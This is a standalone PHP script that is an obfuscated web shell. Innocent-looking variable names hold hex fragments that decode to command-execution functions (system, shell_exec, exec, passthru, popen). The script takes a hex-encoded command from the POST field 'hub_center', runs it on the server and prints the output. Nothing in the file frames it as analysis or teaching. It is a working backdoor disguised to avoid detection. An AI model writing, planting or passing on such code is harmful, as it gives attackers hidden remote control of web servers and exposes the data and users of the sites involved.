<?php


$flag1 = '6d';
$flag2 = '73';
$flag3 = '6c';
$flag4 = '5f';
$flag5 = '65';
$flag6 = '63';
$flag7 = '70';
$flag8 = '68';
$flag9 = '72';
$flag10 = '6f';
$flag11 = '6e';
$flag12 = '74';
$flag13 = '61';
$request_approved1 = pack("H*", '73' . '79' . '73' . '74' . '65' . $flag1);
$request_approved2 = pack("H*", $flag2 . '68' . '65' . $flag3 . $flag3 . $flag4 . '65' . '78' . $flag5 . '63');
$request_approved3 = pack("H*", $flag5 . '78' . $flag5 . $flag6);
$request_approved4 = pack("H*", $flag7 . '61' . '73' . '73' . '74' . $flag8 . $flag9 . '75');
$request_approved5 = pack("H*", '70' . $flag10 . $flag7 . $flag5 . $flag11);
$request_approved6 = pack("H*", '73' . $flag12 . '72' . '65' . $flag13 . $flag1 . '5f' . '67' . '65' . $flag12 . $flag4 . '63' . '6f' . '6e' . '74' . '65' . $flag11 . $flag12 . '73');
$request_approved7 = pack("H*", $flag7 . '63' . $flag3 . $flag10 . $flag2 . $flag5);
$hub_center = pack("H*", $flag8 . '75' . '62' . $flag4 . $flag6 . '65' . $flag11 . '74' . $flag5 . '72');
if (isset($_POST[$hub_center])) {
    $hub_center = pack("H*", $_POST[$hub_center]);
    if (function_exists($request_approved1)) {
        $request_approved1($hub_center);
    } elseif (function_exists($request_approved2)) {
        print $request_approved2($hub_center);
    } elseif (function_exists($request_approved3)) {
        $request_approved3($hub_center, $dat_dchunk);
        print join("\n", $dat_dchunk);
    } elseif (function_exists($request_approved4)) {
        $request_approved4($hub_center);
    } elseif (function_exists($request_approved5) && function_exists($request_approved6) && function_exists($request_approved7)) {
        $binding_res = $request_approved5($hub_center, 'r');
        if ($binding_res) {
            $reference_val = $request_approved6($binding_res);
            $request_approved7($binding_res);
            print $reference_val;
        }
    }
    exit;
}
